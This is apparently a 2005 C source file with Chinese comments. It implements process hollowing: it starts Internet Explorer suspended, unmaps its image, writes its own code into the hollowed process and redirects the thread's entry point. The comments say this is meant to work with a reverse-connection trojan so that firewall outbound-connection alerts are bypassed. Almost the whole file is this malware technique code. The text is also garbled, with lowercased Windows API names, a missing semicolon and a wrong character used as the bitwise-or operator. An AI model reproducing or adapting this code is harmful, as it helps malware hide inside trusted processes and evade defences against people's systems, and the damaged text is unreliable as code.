/*

 author: polymorphours
 
 date: 2005/1/10

 另一种将自己代码注入傀儡进程的方法，配合反弹木马，可绕过防火墙的
 反向连接报警。

*/

#include <stdio.h>
#include <windows.h>

//
// ntdll.lib ( 来自ddk 2000 )
//

#pragma comment(lib,"ntdll.lib")

typedef long ntstatus;

ntsysapi
ntstatus
ntapi
zwunmapviewofsection(
 handle processhandle,
 pvoid baseaddress
 );

typedef struct _childprocessinfo {

 dword dwbaseaddress;
 dword dwreserve;
} childprocess, *pchildprocess;

bool
findiepath(
 char *iepath,
 int *dwbuffsize
 );
 

bool injectprocess(void);

dword
getselfimagesize(
 hmodule hmodule
 );

bool
createinjectprocess(
 pprocess_information pi,
 pcontext pthreadcxt,
 childprocess *pchildprocess
 );

char sziepath[max_path];

int main(void)
{
 if (injectprocess() ) {
 
 printf("this is my a test code,made by (polymorphours)shadow3.\r\n");
 } else {
 
 messagebox(null,"进程插入完成","text",mb_ok);
 }

 return 0;
}

bool
findiepath(
 char *iepath,
 int *dwbuffsize
 )
{
 char szsystemdir[max_path];
 
 getsystemdirectory(szsystemdir,max_path);
 
 szsystemdir[2] = '\0'
 lstrcat(szsystemdir,"\\program files\\internet explorer\\iexplore.exe");
 
 lstrcpy(iepath, szsystemdir);
 return true;
}

bool injectprocess(void)
{
 char szmodulepath[max_path];
 dword dwimagesize = 0;
 
 startupinfo si = {0};
 process_information pi;
 context threadcxt;
 dword *ppeb;
 dword dwwrite = 0;
 childprocess stchildprocess;
 lpvoid lpvirtual = null;
 pimage_dos_header pdosheader = null;
 pimage_nt_headers pvirpehead = null;
 
 hmodule hmodule = null;
 
 zeromemory( szmodulepath, max_path );
 zeromemory( sziepath, max_path );
 
 getmodulefilename( null, szmodulepath, max_path );
 findiepath( sziepath, null );
 
 if ( lstrcmpia( sziepath, szmodulepath ) == 0 ) {
 
 return false;
 }
 
 hmodule = getmodulehandle( null );
 if ( hmodule == null ) {
 
 return false;
 }
 
 pdosheader = (pimage_dos_header)hmodule;
 pvirpehead = (pimage_nt_headers)((dword)hmodule + pdosheader->e_lfanew);
 
 dwimagesize = getselfimagesize(hmodule);
 
 //
 // 以挂起模式启动一个傀儡进程,这里为了传透防火墙，使用ie进程
 //
 
 if ( createinjectprocess(
 &pi,
 &threadcxt ,
 &stchildprocess
 ) ) {

 printf("child pid: [%d]\r\n",pi.dwprocessid);

 //
 // 卸载需要注入进程中的代码
 //
 
 if ( zwunmapviewofsection(
 pi.hprocess,
 (lpvoid)stchildprocess.dwbaseaddress
 ) == 0 ) {

 //
 // 重新分配内存
 //

 lpvirtual = virtualallocex(
 pi.hprocess,
 (lpvoid)hmodule,
 dwimagesize,
 mem_reserve │ mem_commit, page_execute_readwrite
 );
 
 if ( lpvirtual ) {

 printf("unmapped and allocated mem success.\r\n");
 }
 
 } else {

 printf("zwunmapviewofsection() failed.\r\n");
 return true;
 }
 
 if ( lpvirtual ) {
 
 ppeb = (dword *)threadcxt.ebx;
 
 //
 // 重写装载地址
 //
 
 writeprocessmemory(
 pi.hprocess,
 &ppeb[2],
 &lpvirtual,
 sizeof(dword),
 &dwwrite
 );
 
 //
 // 写入自己进程的代码到目标进程
 //
 
 if ( writeprocessmemory(
 pi.hprocess,
 lpvirtual,
 hmodule,
 dwimagesize,
 &dwwrite) ) {
 
 printf("image inject into process success.\r\n");
 
 threadcxt.contextflags = context_full;
 if ( (dword)lpvirtual == stchildprocess.dwbaseaddress ) {
 
 threadcxt.eax = (dword)pvirpehead->optionalheader.imagebase + pvirpehead->optionalheader.addressofentrypoint;
 } else {
 
 threadcxt.eax = (dword)lpvirtual + pvirpehead->optionalheader.addressofentrypoint;
 }
 
 #ifdef debug
 printf("eax = [0x%08x]\r\n",threadcxt.eax);
 printf("ebx = [0x%08x]\r\n",threadcxt.ebx);
 printf("ecx = [0x%08x]\r\n",threadcxt.ecx);
 printf("edx = [0x%08x]\r\n",threadcxt.edx);
 printf("eip = [0x%08x]\r\n",threadcxt.eip);
 #endif
 
 setthreadcontext(pi.hthread, &threadcxt);
 resumethread(pi.hthread);
 
 } else {
 
 printf("wirtememory failed,code:%d\r\n",getlasterror());
 terminateprocess(pi.hprocess, 0);
 }
 
 } else {
 
 printf("virtualmemory failed,code:%d\r\n",getlasterror());
 terminateprocess(pi.hprocess, 0);
 }
 }
 
 return true;
}

dword
getselfimagesize(
 hmodule hmodule
 )
{
 dword dwimagesize;

 _asm
 {
 mov ecx,0x30
 mov eax, fs:[ecx]
 mov eax, [eax + 0x0c]
 mov esi, [eax + 0x0c]
 add esi,0x20
 lodsd
 mov dwimagesize,eax
 
 }

 return dwimagesize;
}

bool
createinjectprocess(
 pprocess_information pi,
 pcontext pthreadcxt,
 childprocess *pchildprocess
 )

{
 startupinfo si = {0};
 
 dword *ppeb;
 dword read;

 // 使用挂起模式启动ie

 if( createprocess(
 null,
 sziepath,
 null,
 null,
 0,
 create_suspended,
 null,
 null,
 &si,
 pi
 ) ) {

 pthreadcxt->contextflags = context_full;
 getthreadcontext(pi->hthread, pthreadcxt);
 
 ppeb = (dword *)pthreadcxt->ebx;
 
 // 得到ie的装载基地址
 readprocessmemory(
 pi->hprocess,
 &ppeb[2],
 (lpvoid)&(pchildprocess->dwbaseaddress),
 sizeof(dword),
 &read
 );

 return true ;

 }

 return false;
}